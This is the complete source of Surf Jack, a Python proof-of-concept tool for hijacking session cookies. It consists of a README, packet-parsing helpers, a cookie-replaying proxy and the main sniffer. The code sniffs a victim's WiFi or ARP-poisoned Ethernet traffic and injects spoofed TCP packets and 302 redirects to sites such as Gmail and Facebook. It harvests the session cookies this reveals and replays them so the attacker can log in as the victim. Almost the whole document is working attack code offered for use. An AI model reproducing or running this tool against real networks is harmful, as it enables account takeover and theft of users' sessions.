├── README
├── helper.py
├── proxy.py
└── surfjack.py

/README:
--------------------------------------------------------------------------------
This is a demonstration tool for the Surf Jack attack.
It is able to hijack the session cookie for various sites
(some of which make use of HTTPS) and allows the tester to log in as the victim.

By: Sandro Gauci

Requirements:
Scapy - http://www.secdev.org/projects/scapy/
Scapy's requirements
Python 2.4+

Features:
* Performs wireless injection when the NIC is in monitor mode
* Supports Ethernet
* Supports WEP (when the NIC is in monitor mode)

Known issues:
* Sometimes the victim is not redirected correctly (particularly seen when targeting Gmail)
* The tool cannot be stopped with a simple Ctrl-C. This is a limitation of the proxy

Installation:
1. Get scapy from http://hg.secdev.org/scapy/raw-file/tip/scapy.py
   For more on the installation of scapy see:
   http://www.secdev.org/projects/scapy/portability.html
2. Extract the Surf Jack files into the same directory as scapy.py

Running:
$ ./surfjack.py --help
Usage: just run surfjack.py. use --help to print out the help

Options:
  --version         show program's version number and exit
  -h, --help        show this help message and exit
  -i INTERFACE      specify an interface
  -v                increase verbosity
  -q                quiet mode
  -j INJIFACE       interface to use to inject packets with
  -W WEPKEY         WEP key
  -c CONFIG         Specify a custom configuration file
  --dontignoreself  Disable ignoring of own traffic

$ ./surfjack.py -i wlan0 -v
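
Configuration:
On first run surfjack.py writes a default surfjack.ini next to the script (see
getconfig() in surfjack.py); a custom file passed with -c uses the same layout.
The example below simply reproduces those shipped defaults:

[surfjack]
site1=http://mail.google.com/
site2=http://myspace.com/
site3=http://www.facebook.com/
site4=http://www.amazon.com/
site5=http://www.skype.com/
site6=http://www.salesforce.com/

[hijack]
ip1=1.1.1.1

The [surfjack] section lists the sites the victim's browser is redirected
through (the cookies it reveals end up in the proxy's cookie jar), while the
[hijack] section lists IP addresses whose TCP connections are hijacked
outright with spoofed SYN/ACKs.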
--------------------------------------------------------------------------------
/helper.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# copyright of sandro gauci 2008
# hijack helper functions
def parseHeader(buff,type='response'):
    import re
    SEP = '\r\n\r\n'
    HeadersSEP = '\r*\n(?![\t\x20])'
    import logging
    log = logging.getLogger('parseHeader')
    if SEP in buff:
        header,body = buff.split(SEP,1)
    else:
        header = buff
        body = ''
    headerlines = re.split(HeadersSEP, header)

    if len(headerlines) > 1:
        r = dict()
        if type == 'response':
            _t = headerlines[0].split(' ',2)
            if len(_t) == 3:
                httpversion,_code,description = _t
            else:
                log.warn('Could not parse the first header line: %s' % `_t`)
                return r
            try:
                r['code'] = int(_code)
            except ValueError:
                return r
        elif type == 'request':
            _t = headerlines[0].split(' ',2)
            if len(_t) == 3:
                method,uri,httpversion = _t
                r['method'] = method
                r['uri'] = uri
                r['httpversion'] = httpversion
            else:
                log.warn('Could not parse the first header line: %s' % `_t`)
                return r
        r['headers'] = dict()
        for headerline in headerlines[1:]:
            SEP = ':'
            if SEP in headerline:
                tmpname,tmpval = headerline.split(SEP,1)
                name = tmpname.lower().strip()
                val = map(lambda x: x.strip(),tmpval.split(','))
            else:
                name,val = headerline.lower(),None
            r['headers'][name] = val
        r['body'] = body
        return r

def getdsturl(tcpdata):
    import logging
    log = logging.getLogger('getdsturl')
    p = parseHeader(tcpdata,type='request')
    if p is None:
        log.warn('parseHeader returned None')
        return
    if p.has_key('uri') and p.has_key('headers'):
        if p['headers'].has_key('host'):
            r = 'http://%s%s' % (p['headers']['host'][0],p['uri'])
            return r
        else:
            log.warn('seems like no host header was set')
    else:
        log.warn('parseHeader did not give us a nice return %s' % p)

def gethost(tcpdata):
    import logging
    log = logging.getLogger('gethost')
    p = parseHeader(tcpdata,type='request')
    if p is None:
        log.warn('parseHeader returned None')
        return
    if p.has_key('headers'):
        if p['headers'].has_key('host'):
            return p['headers']['host']

def getuseragent(tcpdata):
    import logging
    log = logging.getLogger('getuseragent')
    p = parseHeader(tcpdata,type='request')
    if p is None:
        log.warn('parseHeader returned None')
        return
    if p.has_key('headers'):
        if p['headers'].has_key('user-agent'):
            return p['headers']['user-agent']

def calcloglevel(options):
    logginglevel = 30
    if options.verbose is not None:
        if options.verbose >= 3:
            logginglevel = 10
        else:
            logginglevel = 30-(options.verbose*10)
    if options.quiet:
        logginglevel = 50
    return logginglevel

def getcookie(tcpdata):
    p = parseHeader(tcpdata,type='request')
    if p is None:
        return
    if p.has_key('headers'):
        if p['headers'].has_key('cookie'):
            return p['headers']['cookie']
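
# Example usage (a sketch, not part of the original module): what the parsers
# return for a minimal captured GET request. The request string below is made
# up purely for illustration.
#
#   >>> from helper import parseHeader, getdsturl, getcookie
#   >>> req = 'GET /inbox HTTP/1.1\r\nHost: example.com\r\nCookie: SID=abc123\r\n\r\n'
#   >>> parseHeader(req, type='request')['uri']
#   '/inbox'
#   >>> getdsturl(req)
#   'http://example.com/inbox'
#   >>> getcookie(req)
#   ['SID=abc123']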
--------------------------------------------------------------------------------
/proxy.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
__doc__ = """Modified by sandro gauci for surfjack

Originally called: Tiny HTTP Proxy.

This module implements GET, HEAD, POST, PUT and DELETE methods
on BaseHTTPServer, and behaves as an HTTP proxy. The CONNECT
method is also implemented experimentally, but has not been
tested yet.

Any help will be greatly appreciated.           SUZUKI Hisao
"""

__version__ = "0.2.2"

import BaseHTTPServer, select, socket, urlparse, SocketServer
import cgi, urllib
from threading import Thread
import logging

class Ate:
    def __init__(self):
        self.cookies = False


class ProxyHandler (BaseHTTPServer.BaseHTTPRequestHandler):
    log = logging.getLogger('ProxyHandler')
    __base = BaseHTTPServer.BaseHTTPRequestHandler
    __base_handle = __base.handle
    setcookiepkt = "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nContent-Length: %s\r\n%s\r\n%s"
    server_version = "TinyHTTPProxy/" + __version__
    rbufsize = 0                        # keep self.rfile unbuffered
    def handle(self):
        (ip, port) = self.client_address
        if hasattr(self, 'allowed_clients') and ip not in self.allowed_clients:
            self.raw_requestline = self.rfile.readline()
            if self.parse_request(): self.send_error(403)
        else:
            self.__base_handle()

    def _connect_to(self, netloc, soc):
        i = netloc.find(':')
        if i >= 0:
            host_port = netloc[:i], int(netloc[i+1:])
        else:
            host_port = netloc, 80
        self.log.debug("\t" "connect to %s:%d" % host_port)
        try: soc.connect(host_port)
        except socket.error, arg:
            try: msg = arg[1]
            except: msg = arg
            self.send_error(404, msg)
            return 0
        return 1

    def do_CONNECT(self):
        soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            if self._connect_to(self.path, soc):
                self.log_request(200)
                self.wfile.write(self.protocol_version +
                                 " 200 Connection established\r\n")
                self.wfile.write("Proxy-agent: %s\r\n" % self.version_string())
                self.wfile.write("\r\n")
                sslsock = socket.ssl(soc)
                self._read_write(sslsock, 300, ssl=True)
        finally:
            self.log.debug("\t bye")
            soc.close()
            self.connection.close()

    def do_GET(self):
        global cookiejar
        global victimheaders
        global ate
        (scm, netloc, path, params, query, fragment) = urlparse.urlparse(
            self.path, 'http')
        if scm != 'http' or fragment or not netloc:
            self.send_error(400, "bad url %s" % cgi.escape(self.path))
            return
        soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            (ip, port) = self.client_address
            cookiehosts = cookiejar.keys()
            if (netloc == 'setcookies' or not ate.cookies):
                self.log.debug('time to set some cookies')
                if len(cookiehosts) > 0:
                    self.log.debug('%s cookies available to set' % len(cookiehosts))
                    if netloc in cookiehosts:
                        newcookie = cookiejar[netloc]
                        headers = ''.join(map(lambda x: 'Set-cookie: %s;\r\n' % x, newcookie.split(';')))
                        nextpos = cookiehosts.index(netloc)+1
                        print 'setting cookie for %s' % netloc
                        if nextpos >= len(cookiehosts):
                            body = "<html><body>all cookies set<br>\r\n"
                            ate.cookies = True
                            #cookiejar.clear()
                            body += ''.join(map(lambda x: "<a href=\"http://%s\">%s</a><br>\r\n" % (urllib.quote(x),cgi.escape(x)),cookiehosts))
                            body += "go to http://setcookies to set new cookies later on</body></html>"
                        else:
                            nextdestination = cookiehosts[nextpos]
                            body = '<html><head><meta http-equiv="refresh" content="0;url=http://%s"></head></html>' % urllib.quote(nextdestination)
                    else:
                        headers = ''
                        body = '<html><head><meta http-equiv="refresh" content="0;url=http://%s"></head><body>taking you somewhere</body></html>' % urllib.quote(cookiehosts[0])
                else:
                    headers = ''
                    body = '<html><body>no cookies to set<br>\r\ngo to http://setcookies to set cookies later on</body></html>'
                self.log.debug(self.setcookiepkt % (len(body),headers,body))
                self.wfile.write(self.setcookiepkt % (len(body),headers,body))
            else:
                if self._connect_to(netloc, soc):
                    self.log_request()
                    soc.send("%s %s %s\r\n" % (
                        self.command,
                        urlparse.urlunparse(('', '', path, params, query, '')),
                        self.request_version))
                    #for header in victimheaders.keys():
                    #    self.headers[header] = victimheaders[header][0]
                    self.headers['Connection'] = 'close'
                    del self.headers['Proxy-Connection']
                    if netloc in cookiejar.keys():
                        self.headers['Cookie'] = cookiejar[netloc]
                    for key_val in self.headers.items():
                        soc.send("%s: %s\r\n" % key_val)
                    soc.send("\r\n")
                    self._read_write(soc)
        finally:
            self.log.debug("\t bye")
            soc.close()
            self.connection.close()

    def _read_write(self, soc, max_idling=20, ssl=False):
        if ssl:
            connection = socket.ssl(self.connection)
        else:
            connection = self.connection

        iw = [connection, soc]
        ow = []
        count = 0
        while 1:
            count += 1
            (ins, _, exs) = select.select(iw, ow, iw, 3)
            if exs: break
            if ins:
                for i in ins:
                    if i is soc:
                        out = connection
                    else:
                        out = soc
                    data = i.recv(8192)
                    if data:
                        out.send(data)
                        count = 0
            else:
                self.log.debug("\t idle %s" % count)
            if count == max_idling: break

    do_HEAD = do_GET
    do_POST = do_GET
    do_PUT = do_GET
    do_DELETE = do_GET

class ThreadingHTTPServer (SocketServer.ThreadingMixIn,
                           BaseHTTPServer.HTTPServer): pass


def dummy_log():
    return
## this looks just like Wifizoo's
## that's because it is. Originally I started modifying the original code
## then noticed that wifizoo used the same code, and that's great :)

class DrukqsProxy(Thread):
    import logging
    log = logging.getLogger('DrukqsProxy')
    def __init__(self):
        Thread.__init__(self)
    def run(self):
        global ate
        global cookiejar
        #global victimheaders
        HandlerClass = ProxyHandler
        ServerClass = ThreadingHTTPServer
        protocol = 'HTTP/1.0'
        port = 8080
        server_address = ('127.0.0.1', port)
        HandlerClass.protocol_version = protocol
        httpd = ServerClass(server_address, HandlerClass)
        httpd.log_message = dummy_log
        sa = httpd.socket.getsockname()
        ate = Ate()
        cookiejar = self.cookiejar
        #victimheaders = self.victimheaders
        self.log.info("Drukqs HTTP Proxy on %s:%s" % sa)
        httpd.serve_forever()
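
# Example (a sketch, not part of the original module): how surfjack.py drives
# this proxy. A cookiejar dict must be attached before start(); the proxy then
# listens on 127.0.0.1:8080 and replays the captured cookies into the browser
# that is pointed at it.
#
#   from proxy import DrukqsProxy
#   proxy = DrukqsProxy()
#   proxy.cookiejar = {}      # filled by the sniffer: host -> cookie string
#   proxy.start()             # runs in a thread; serve_forever() never returns
#
# Visiting http://setcookies through the proxy restarts the cookie-setting
# round at any time.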
--------------------------------------------------------------------------------
/surfjack.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# proof of concept by sandro gauci
# enablesecurity 2008
# 20080809
# what it does: forces web browsers to go to specific sites. This has the effect
# of forcing these browsers to reveal the cookie. The attack needs to be launched
# from a network location that allows the attacker to view all traffic being sent
# by the victim. Examples of such locations are WiFi and Ethernet+ARP poisoning
#
# features:
# - handles Ethernet connections (use ettercap etc to poison ARP tables)
# - handles WiFi connections with WEP support
#   (needs the card to be in monitor mode + allow packet injection)
# - handles hosts which do not have port 80 open
try:
    from scapy.all import *
except ImportError:
    from scapy import *
from helper import *
from proxy import DrukqsProxy
import logging
import socket
import sys

__GPL__ = """

Surf Jack is a demonstration tool for session cookie hijacking
Copyright (C) 2008 Sandro Gauci

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
if sys.hexversion < 0x020400f0:
    sys.stderr.write("Please update to python 2.4 or greater to run Surf Jack\r\n")
    sys.exit(1)

# HTTP 302 template injected into the victim's TCP stream; %(url)s is filled
# in with the next site to be hijacked
redirmsg = ["HTTP/1.1 302 Found",
            "Location: %(url)s",
            "Cache-Control: private",
            "Content-Type: text/html; charset=UTF-8",
            "Server: o_o",
            "Content-Length: 0",
            '',
            '']

redirpkt = '\r\n'.join(redirmsg)
redirpkt += '\r\n'*100
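
# Worked example (sketch): the response the victim's browser receives once
# %(url)s is filled in, here with the first site from the default config:
#
#   HTTP/1.1 302 Found
#   Location: http://mail.google.com/
#   Cache-Control: private
#   Content-Type: text/html; charset=UTF-8
#   Server: o_o
#   Content-Length: 0
#
# The browser follows the Location header over plain HTTP and sends its cookie
# for that site, which the sniffer callback below picks up.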
hijacked = dict()

__version__ = '0.2'
__author__ = "Sandro Gauci"
class tcpsessions:
    """ Sets up TCP Sessions and able to reconstruct fragmented tcp packets """
    import logging
    def __init__(self):
        global victimheaders
        self.log = logging.getLogger('tcpsessions')
        self.log.debug('initialized tcpsessions()')
        self.packets = dict()
        self.victimheaders = victimheaders

    def addpacket(self,packet):
        """adds the packet to the list"""
        if packet.haslayer(Raw):
            self.log.debug('we have a packet with payload')
            ipsrc = packet.getlayer(IP).src
            ipdst = packet.getlayer(IP).dst
            seq = packet.getlayer(TCP).seq
            ack = packet.getlayer(TCP).ack
            k = ipsrc,ipdst,ack
            if self.packets.has_key(k):
                self.log.debug('adding to previous packet (fragmented) %s' % str(k))
                self.packets[k] += packet.getlayer(Raw).load
                self.log.debug(self.packets[k])
            else:
                self.log.debug('new packet, creating new session %s' % str(k))
                self.packets[k] = packet.getlayer(Raw).load
                self.log.debug(self.packets[k])

    def getcookies(self):
        """ searches through all sessions looking for cookies"""
        cookies = dict()
        for k in self.packets.keys():
            self.log.debug(self.packets[k])
            cookie = getcookie(self.packets[k])
            if cookie is not None:
                h = gethost(self.packets[k])[0]
                cookies[h] = cookie[0]
                self.victimheaders.update(parseHeader(self.packets[k],'request')['headers'])
        return(cookies)


def http_monitor_callback(pkt):
    """handle each packet that matches the filter. This is where all the
    logic is"""
    packetbasket = list()
    log = logging.getLogger('http_monitor_callback')
    if pkt.haslayer(TCP):
        if pkt.haslayer(Dot11):
            uid = pkt.getlayer(Dot11).addr2
        elif pkt.haslayer(Ether):
            uid = pkt.getlayer(Ether).src
        else:
            log.error('protocol neither ethernet nor wifi - need to add support')
            return
        if hijacked.has_key(uid):
            if hijacked[uid]['closed']:
                log.debug('uid:%s is closed - skipping' % uid)
                return

        if uid in ignoreethersrc:
            log.debug('this is an ignored ethernet src')
            return
        if pkt.haslayer(Dot11):
            log.debug('building an 802.11 packet for you')
            l2 = Dot11(addr1=pkt.getlayer(Dot11).addr2,
                       addr2=pkt.getlayer(Dot11).addr1,
                       addr3=pkt.getlayer(Dot11).addr3,
                       FCfield="from-DS"
                       ) / \
                 LLC() / \
                 SNAP()
        elif pkt.haslayer(Ether):
            log.debug('building an Ethernet packet for you')
            l2 = Ether(dst=pkt.getlayer(Ether).src,src=pkt.getlayer(Ether).dst)
        else:
            log.critical('protocol neither ethernet nor wifi - need to add support - please let me know about this')
            return
        l3 = IP(src=pkt.getlayer(IP).dst, dst=pkt.getlayer(IP).src)
        l4 = TCP(dport=pkt.getlayer(TCP).sport,sport=pkt.getlayer(TCP).dport)
        log.debug('ethernet src: %s' % (uid))

        if pkt.getlayer(IP).dst in hijackwholeconnection:
            if pkt.getlayer(TCP).flags == 2:
                log.debug("syn packet - time to hijack this connection")
                # SYN .. handle it
                pktreply = l2 / l3 / l4
                pktreply.getlayer(TCP).ack = pkt.getlayer(TCP).seq+1
                pktreply.getlayer(TCP).flags = 'SA'
                packetbasket = [pktreply]

        if pkt.getlayer(TCP).flags == 24 or pkt.getlayer(TCP).flags == 16:
            # psh ack
            if pkt.haslayer(Raw):
                log.debug('got some data')
                tcpdata = pkt.getlayer(Raw).load
                tcpsess.addpacket(pkt)
                nextdestination = None
                if tcpdata.startswith("GET "):
                    log.debug('tcpdata starts with GET')
                    dsturl = getdsturl(tcpdata)
                    log.info('destination url in packet: %s' % dsturl)
                    if dsturl in hijackdomains:
                        nextpos = hijackdomains.index(dsturl) + 1
                        if nextpos >= len(hijackdomains):
                            nextdestination = hijacked[uid]['originaldestination']
                        else:
                            nextdestination = hijackdomains[nextpos]
                        log.info('dsturl %s in hijackdomains; next destination: %s' % (dsturl,nextdestination))

                    if not hijacked.has_key(uid):
                        log.info('first time that we see %s' % uid)
                        hijacked[uid] = dict()
                        hijacked[uid]['originaldestination'] = dsturl
                        hijacked[uid]['closed'] = False
                    elif dsturl == hijacked[uid]['originaldestination']:
                        hijacked[uid]['closed'] = True
                        log.info('closing up')
                        cookiejar.update(tcpsess.getcookies())
                        log.info('cookiejar: %s' % str(cookiejar))
                    if nextdestination is None:
                        nextdestination = hijackdomains[0]
                    if nextdestination is not None:
                        log.debug('nextdestination is %s' % nextdestination)
                        credirpkt = redirpkt % {'url': nextdestination}
                        pktreply = l2 / l3 / l4
                        pktreply.getlayer(TCP).seq = pkt.getlayer(TCP).ack
                        pktreply.getlayer(TCP).ack = pkt.getlayer(TCP).seq+len(tcpdata)
                        pktreply.getlayer(TCP).flags = "PA"
                        finpkt = pktreply.copy()
                        pktreply.getlayer(TCP).add_payload(credirpkt)
                        finpkt.getlayer(TCP).flags = "FA"
                        finpkt.getlayer(TCP).seq += len(credirpkt)
                        packetbasket = [pktreply,finpkt]
                        log.debug('src = %s ; dst = %s' % (pkt.getlayer(IP).dst,pkt.getlayer(IP).src))
                        log.info('sent redirect to %s' % nextdestination)
                else:
                    log.debug('not a GET request')
        elif pkt.getlayer(TCP).flags == 17:
            # fin ack
            log.debug('handling fin packets')
            pktreply = l2 / l3 / l4
            pktreply.getlayer(TCP).ack = pkt.getlayer(TCP).seq+1
            pktreply.getlayer(TCP).seq = pkt.getlayer(TCP).ack
            pktreply.getlayer(TCP).flags = 'FA'
            packetbasket.append(pktreply)
        if packetbasket:
            sendp(packetbasket,verbose=0, iface=injiface)

def getconfig(fn):
    from ConfigParser import ConfigParser
    import logging
    log = logging.getLogger('getconfig')
    configparser = ConfigParser()
    for x in xrange(3):
        if len(configparser.read(fn)) > 0:
            break
        else:
            defaultconfig = list()
            defaultconfig.append('[surfjack]')
            defaultconfig.append('site1=http://mail.google.com/')
            defaultconfig.append('site2=http://myspace.com/')
            defaultconfig.append('site3=http://www.facebook.com/')
            defaultconfig.append('site4=http://www.amazon.com/')
            defaultconfig.append('site5=http://www.skype.com/')
            defaultconfig.append('site6=http://www.salesforce.com/')
            defaultconfig.append('')
            defaultconfig.append('[hijack]')
            defaultconfig.append('ip1=1.1.1.1')
            log.warn("%s not found.. creating default" % fn)
            _tmp = open(fn,'w')
            _tmp.write('\r\n'.join(defaultconfig))
            _tmp.write('\r\n')
            _tmp.close()
            continue
    r = list()
    for _section in ['surfjack','hijack']:
        if not configparser.has_section(_section):
            log.critical('configuration does not have section %s' % _section)
            return
        s = list()
        for _option in configparser.options(_section):
            s.append(configparser.get(_section,_option))
        r.append(s)
    return r

if __name__ == "__main__":
    from optparse import OptionParser
    o = OptionParser(usage="just run %prog. use --help to print out the help",
                     version="%prog v"+str(__version__)+__GPL__)
    o.add_option('-i', help='specify an interface', dest="interface")
    o.add_option('-v', help="increase verbosity", dest='verbose', action='count')
    o.add_option('-q', help="quiet mode", dest='quiet', default=False,
                 action='store_true')
    o.add_option('-j', help="interface to use to inject packets with",
                 dest="injiface")
    o.add_option('-W', help="WEP key", dest="wepkey")
    o.add_option('-c', help="Specify a custom configuration file", dest='config',
                 default='surfjack.ini')
    o.add_option('--dontignoreself', help="Disable ignoring of own traffic",
                 dest="ignoreself", default=True, action="store_false")
    options, args = o.parse_args()
    loglevel = calcloglevel(options)
    logging.basicConfig(level=loglevel)
    log = logging.getLogger()
    ignoreethersrc = list()
    _tmp = getconfig(options.config)
    if _tmp is None:
        sys.exit(1)
    hijackdomains,hijackwholeconnection = _tmp
    log.info('surfjacking the following sites: %s' % (' '.join(hijackdomains)))
    log.info('hijacking connections to the following ips: %s' % (' '.join(hijackwholeconnection)))
    if options.interface is not None:
        log.debug('setting interface to %s' % options.interface)
        conf.iface = options.interface
    injiface = conf.iface
    if options.injiface is not None:
        injiface = options.injiface
    log.info('monitor interface: %s' % conf.iface)
    log.info('inject interface: %s' % injiface)
    if options.wepkey is not None:
        conf.wepkey = options.wepkey
    if options.ignoreself:
        try:
            ignoreethersrc.append(get_if_hwaddr(conf.iface))
        except:
            log.warn('could not add local address to the ignore list')
    cookiejar = dict()
    victimheaders = dict()
    proxy = DrukqsProxy()
    proxy.cookiejar = cookiejar
    proxy.victimheaders = victimheaders
    proxy.start()
    log.info('started proxy')
    tcpsess = tcpsessions()
    try:
        log.debug('sniffing')
        sniff(prn=http_monitor_callback, filter="tcp dst port 80", store=0)
    except socket.error:
        log.critical('could not run - probably a permissions problem')
--------------------------------------------------------------------------------